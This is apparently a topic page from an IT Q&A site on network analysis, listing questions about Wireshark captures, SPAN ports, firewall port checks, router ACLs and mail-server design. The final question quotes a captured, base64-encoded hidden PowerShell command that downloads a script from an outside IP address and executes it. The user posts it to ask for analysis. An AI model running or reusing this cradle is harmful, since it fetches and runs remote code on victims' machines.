Network Analysis

9K

Solutions

22

Content

i
The collection of articles, videos, and posts on this topic.

12K

Contributors

Network analysis is the process of identifying and remediating the processes and systems within a network, including performance, connectivity and security. The process is performed through the use of tools developed for monitoring and analyzing network activity. Network problems that involve finding an optimal way of doing something are studied under the name combinatorial optimization. Examples include network flow, shortest path problem, transport problem, transshipment problem, location problem, matching problem, assignment problem, packing problem, routing problem, Critical Path Analysis and PERT (Program Evaluation & Review Technique).

Share tech news, updates, or what's on your mind.

Sign up to Post

Port 5083 : Qpur File Protocol
Can somebody tell me for what purpose is this service used for?
1
2 Comments
Become a CompTIA Certified Healthcare IT Tech
LVL 12
Become a CompTIA Certified Healthcare IT Tech

This course will help prep you to earn the CompTIA Healthcare IT Technician certification showing that you have the knowledge and skills needed to succeed in installing, managing, and troubleshooting IT systems in medical and clinical settings.

Learn More!
Dear Experts,

I am a new starter to a job, and have been given an initial project to work on that I'm hoping that you can help with.

The customer has an ageing archiving solution with SAN storage that archives email from their MS Exchange platform. There is a separate project that is almost complete that will replace the solution.

I have been given the task of overseeing the decommissioning of the SAN storage.

The customer believes that the only solution using the SAN storage was the legacy email archiver, but cannot be 100% sure that other applications haven't developed dependencies on the SAN storage during it's lifespan, and I've been asked to perform some due dilligence on the SAN to try an identify any unexpected connectivity.

My initial thoughts are to run something like WireShark on that network segement to identify any traffic with the SAN IP as a destination.

Is that the right approach?

If not, what do you recommend?

If it is, could you give me some guidance on how what config I should put into Wireshark to help me see the right results?

Many thanks in advance.
0
5 Comments
I am sysadmin..I want to know

I want to reach the server, to check the connectivity thru specific port.
This is just to varify whether the required firewall rule defined properly or not.
0
26 Comments
Consider the below scenario

userPC---- firewall --- Destination-server
                         10.1.1.1


I have installed some software on the server, the service  of that software is using port # 301.

1) Scenario...
      Firewall defined
      server#  service UP
        userPC# telnet 10.1.1.1 301  --> user get reply

2)Scenario...
      Firewall defined
      server# service DOWN

is there any command/3rdparty-tools available to just varify, pockets from userPC able to reach on the server through port#301

==
This I asked just to segregate if there any issue, problem from firewall side (or) destination server side.
0
5 Comments
What does this mean?

Trans2 Request, QUERY_PATH_INFO, Query File Basic Info, Path: \clients\client2
Trans2 Response QUERY_PATH_INFO, Error: STATUS_OBJECT_PATH_NOT _FOUND
Trans2 Request, QUERY_PATH_INFO, Query File Basic Info, Path: \clients\client1
Trans2 Response QUERY_PATH_INFO, Error: STATUS_OBJECT_PATH_NOT _FOUND
Trans2 Request, QUERY_PATH_INFO, Query File Basic Info, Path: \clients
Trans2 Response QUERY_PATH_INFO, Error: STATUS_OBJECT_NAME_NOT _FOUND
NT Create AndX Request, FID: 0x4014, Path: \clients
Trans2 Request, QUERY_PATH_INFO, Query File Basic Info, Path: \clients
445 > 2161 [ACK] Seq=171 Ack=576 Win=17138 Len=0
0
2 Comments
Hi... Can anyone tell me what is this Simple Network Audio Protocol running on port 4752 ? Thanks
0
1 Comment
ac
in the topology above , I have 2 routers with 2 loopbacks.
on R2 I configured an access list to permit only 192.168.12.0 which is the link between R1 and R2, for some reason I cannot ping loopback 1.1.1.1 of R1 which makes sense,  but I can ping from R1 to loopback of R2.  I thought both loopbacks cannot be ping because of the access list:

configuration below:

R1:
R1#sh run 
Building configuration...

Current configuration : 1792 bytes
!
! Last configuration change at 16:05:15 CET Sat Aug 18 2018
!
version 15.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname R1
!
boot-start-marker
boot-end-marker
!
aqm-register-fnf
!
!
no aaa new-model
clock timezone CET 1 0
mmi polling-interval 60
no mmi auto-configure
no mmi pvc
mmi snmp-timeout 180
!
!
!
!
!
!


!
!
!
!
ip cef
no ipv6 cef
!
multilink bundle-name authenticated
!
!
!
!
!
!
!         
!
!
redundancy
!
!
! 
!
!
!
!
!
!
!
!
!
!
!
!
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
!
interface Ethernet0/0
 ip address 192.168.12.1 255.255.255.0
!
interface Ethernet0/1
 no ip address
 shutdown
!
interface Ethernet0/2
 no ip address
 shutdown
!
interface Ethernet0/3
 no ip address
 shutdown
!
interface Ethernet1/0
 no ip address
 shutdown
!
interface Ethernet1/1
 no ip address
 shutdown
!
interface Ethernet1/2
 no ip address
 shutdown
!
interface Ethernet1/3
 no ip address
 shutdown
!
interface Serial2/0
 no ip address

Open in new window
0
8 Comments
Hi.. This is regarding networking port no. 2829, 2832, 2831 and 2830. According to IANA website, this is something silkp1, silkp2, silkp3 and silkp4. Can anyone tell me what is this silkp ?
0
2 Comments
Don't have much documentation at my new place and I wanted to know where to begin to understand our DR/BDR information.  I specifically wanted to know what it costs the company to be down for an hour or a day and so forth.  Since we don't have much documentation, it is really hard to understand or where to begin.
0
8 Comments
I want to sniff network traffic from my firewall to our SIP Cloud provider.  I have not used wireshark much.  Can someone give me simple rundown of how to do this?

I just downloaded the lates version of wireshark.
0
9 Comments
Exploring SharePoint 2016
LVL 12
Exploring SharePoint 2016

Explore SharePoint 2016, the web-based, collaborative platform that integrates with Microsoft Office to provide intranets, secure document management, and collaboration so you can develop your online and offline capabilities.

Start Today!
Hi guys ,

I have a domain controller in amazon , connected to 2 other dcs . The AD traffic is good . I asked the cloud provider to update the ldap lookup on their fortinet edge device for the vpn AD authentication. They are unable to connect . All rules and routes are good . I did a wireshark capture of the traffic from my dc ( 172.31.33.10) to the their edge device ( 172.16.250.69) . Can someone chec and advise pls, there is a RST on the handshae , my network analysis is rusty . Which side is dropping ? See attach
ldapRST.pcapng
0
3 Comments
Have anyone used multi-mode to single mode fiber converters?  Are they reliable?  
I need to run 40G optics between the floors in the three building floors (floors 1,2,and3).  MM fiber is already in place.  To support 40G between these three floors we need single mode duplex LC fiber.  
Instead of doing new SM runs, can we install converters to achieve that?  Would that work reliably?
0
3 Comments
I have installed IP Cameras on 5 different locations in the US and I want to watch all those IP cameras in India, but the Ping Test gives me this result after having a 100 Mbps connection -> bytes= 32 time= 579 TTL=117. Because of which I am unable to watch the live view smoothly. It gets freeze after every other 2 Seconds.
0
17 Comments
Dear Experts

We have been asked to deploy on premise mail server for which we are planning to go for zimbra network but before to that we have to design the network,  though this email server will be working for internal within main office and branch office as it is connected in mpls network but we also would like to send and receive mails to external domains following measures to be taken
1. if our server or internet goes down the sender mail should not get lost for us once the server or internet gets restored the mails should be delivered to our emails accounts.
2. our domain and ip reputation should be always good so that our messages gets delivered to the inbox on the recipient email
please suggest on how our email server to be configured have internal dns server and make it work as normal email server and for external we have to avail SMTP RELAY service with some service provider please suggest is this correct if not please suggest what service we have to avail for external email delivery with email security will be taken care.
0
6 Comments
Using Wireshark I want to check if the traffic is going through an upstream firewall device ,how can I do that ?
0
3 Comments
Experts,

I could be logged into my system and looking at real time logs of our active directory logs from our Splunk system.
Not touching my keyboard I see event ID 4624 trickle in for me. It's almost like it's every 7-8 minutes.  What's the reason
AD would constantly report 4624 on a user when they are not doing any logging in? It makes making sense of the logs useless when you
want to identify how many times a user logs into their computer in a day.
0
5 Comments
Hi,

We configured a SPAN port in a Cisco switch to be used for an upcoming network analysis solution but we need to make sure that it is functioning before implementation date.
What is best method to test a SPAN port ?

Thanks
0
1 Comment
If you have two Internet feeds with BGP attracting traffic to your site and one goes out - should that interfere with ongoing uploads?
Say I had 200 uploads via sftp to my site. Provider A does some maintenance but Provider B stays up. Traffic load drops to 50
uploads. Since the connections are TCP/SFTP I would think they would just pause and then continue once the available path became
available. Or is it the case that the reconvergence/hold down timers are likely just too long to keep most of those conversations
alive?
0
3 Comments
Would it be beneficial mixing up different switches models in the same office.  For example we're using C3850 access switches and need to add few more to cover the entire office.
Cisco recommends going with new C9300 for the access layer.  Would it create some operational issues?  I like to keep a consistency but like to evaluate a potential upgrade.
Advice?
0
3 Comments
Microsoft Azure 2017
LVL 12
Microsoft Azure 2017

Azure has a changed a lot since it was originally introduce by adding new services and features. Do you know everything you need to about Azure? This course will teach you about the Azure App Service, monitoring and application insights, DevOps, and Team Services.

Learn More!
We have a customer who has issues with their Lan environment being slow.

Is there a free tool out there or even a trial out there that would monitor the bandwidth and maybe even ping the devices on the network to see which device might be the root cause. Like a bad switch for example.
0
6 Comments
I have 10mbps links between my locations and we have been experiencing network latency, primarily in the afternoons. I contacted my ISP and they were rather tight-lipped about what traffic was causing the problem. It took 8 months, countless tickets, and repeated threats to finally get the small amount of information that I have- that the primary network congestion is being caused by 4 domain controllers communicating with a domain controller in the hub of our network. I have modified the link costing and replication schedules and am pulling utilization reports tomorrow. I am going to run a packet capture with Wireshark. It is going to run from a desktop computer connected to a port that monitors the MPLS pot and filter by IP address for each of the DC’s communicating back to the hub. What should I look for in the capture that might indicate the source of what is flooding the network?
0
2 Comments
Dear Experts, I'm testing the SPAN feature in Switch Cisco 3750. This is the diagram:

SPAN.png
This is configuration on Core SW:

monitor session 1 source vlan 55 both
monitor session 1 destination interface g1/0/13

Open in new window


It seems like working but the whole vlan 18 was hang, so I could NOT access the PC which was installed wireshark. How can I fix it? Can we just mirror traffic from some IP addresses, not all VLAN?

Many thanks as always!
0
4 Comments
Dear experts,

I am new to the DNS and DNS load test. Now i have task to test Load Test on two BIND9 servers [RHEL6]. I had googled it and i found dnspref is good tool to evaluate throughput and latency. However, I need a script to do this task. I will be very helpful for me if any one share the info.

thanks,
Maddy..
0
2 Comments
SIEM must examine concepts of normality and abnormality traffic/data flow patterns. SIEM need to constitute use of adaptive intelligence. Companies need to evaluate SIEM products based on their own objectives to determine the product that best meet their needs.
2
1 Comment

Expert Comment

by:Gökhan POLAT
Comment Utility
Great article 👍
0
Would someone decode this base64 for me? I used to be able to decode this but now I can't seem to get it working. It was taken from a payload of a wireshark packet capture.


JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==


The complete string is:

      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
0
8 Comments

Network Analysis

9K

Solutions

22

Content

i
The collection of articles, videos, and posts on this topic.

12K

Contributors

Network analysis is the process of identifying and remediating the processes and systems within a network, including performance, connectivity and security. The process is performed through the use of tools developed for monitoring and analyzing network activity. Network problems that involve finding an optimal way of doing something are studied under the name combinatorial optimization. Examples include network flow, shortest path problem, transport problem, transshipment problem, location problem, matching problem, assignment problem, packing problem, routing problem, Critical Path Analysis and PERT (Program Evaluation & Review Technique).

Advertise Here
Advertise Here